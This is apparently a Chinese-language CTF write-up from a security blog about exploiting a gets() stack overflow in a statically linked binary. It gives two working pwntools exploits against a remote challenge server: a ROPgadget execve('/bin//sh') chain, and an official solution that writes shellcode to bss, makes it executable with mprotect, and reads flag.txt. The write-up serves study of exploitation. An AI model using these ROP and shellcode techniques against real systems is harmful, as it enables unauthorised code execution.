ReStr0
Venom战队队员 Chamd5安全团队
ReStr0-Blog

神奇的gets()

题目来自某群友给我发的一道题目,跟我说,就一个栈溢出,你能getshell吗?然后我有点懵逼,一开始并没有一点点的思路,然后我就去想了想,既然存在栈溢出,而且是静态编译,那我是不是可以构建ROP链直接getshell,而且借助ropper,构建链子简简单单。

题目内容

给了一个栈溢出,开了

https://blog.restro.cn/wp-content/uploads/2021/08/image-18.png
https://blog.restro.cn/wp-content/uploads/2021/08/image-19.png

题目代码很简单,,就这么一点点,也没有后门函数

所以想到了借助ROP链子来打

EXP

#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from LibcSearcher import *
from struct import pack

#io = process('./a.out')
io = remote('34.136.150.230','49156')

context.log_level='debug'

p = ''
#p += pack('<Q', 0x043db10)
p += pack('<Q', 0x000000000040961e) # pop rsi ; ret
p += pack('<Q', 0x00000000004b90e0) # @ .data
p += pack('<Q', 0x0000000000443657) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x0000000000445625) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040961e) # pop rsi ; ret
p += pack('<Q', 0x00000000004b90e8) # @ .data + 8
p += pack('<Q', 0x000000000043db10) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000445625) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004018a4) # pop rdi ; ret
p += pack('<Q', 0x00000000004b90e0) # @ .data
p += pack('<Q', 0x000000000040961e) # pop rsi ; ret
p += pack('<Q', 0x00000000004b90e8) # @ .data + 8
p += pack('<Q', 0x00000000004017df) # pop rdx ; ret
p += pack('<Q', 0x00000000004b90e8) # @ .data + 8
p += pack('<Q', 0x000000000043db10) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468d30) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004012be) # syscall


io.send('a'*0x48+p)

io.interactive()

结果

成功getshell,但是仅仅获取了本地的,远程的无法打通

https://blog.restro.cn/wp-content/uploads/2021/08/image-20-1024x504.png

可以远程getshell,但是无法发送指令,应该是没打通

官方WP

可能是因为开了waf的原因

from pwn import *
#context.log_level='debug'
context.arch='amd64'
#p=process("./babystack.out")
p=remote("34.136.150.230",49156)
elf=ELF("./babystack.out")

rdi=0x00000000004018f4
rsi=0x000000000040970e
rdx=0x000000000040182f
bss=0x4b9000
gets=0x40bd70
main=0x40209c
mprotect=0x443af0

payload=b"A"*0x40
payload+=b"B"*0x8
payload+=p64(rdi)
payload+=p64(bss)
payload+=p64(gets)#write shellcode in bss
payload+=p64(rdi)+p64(bss)+p64(rsi)+p64(0x3000)+p64(rdx)+p64(7)
payload+=p64(mprotect)#execute mprotect
payload+=p64(bss)


shellcode=shellcraft.open("./flag.txt",0,0)
shellcode+=shellcraft.read("rax",0x4b9000,1000)
shellcode+=shellcraft.write(1,0x4b9000,1000)
sleep(0.2)
p.sendline(payload)
sleep(0.2)
p.sendline(asm(shellcode))
p.interactive()

发表评论

textsms
account_circle
email

ReStr0-Blog

神奇的gets()
题目来自某群友给我发的一道题目,跟我说,就一个栈溢出,你能getshell吗?然后我有点懵逼,一开始并没有一点点的思路,然后我就去想了想,既然存在栈溢出,而且是静态编译,那我是不是可…
扫描二维码继续阅读
2021-08-07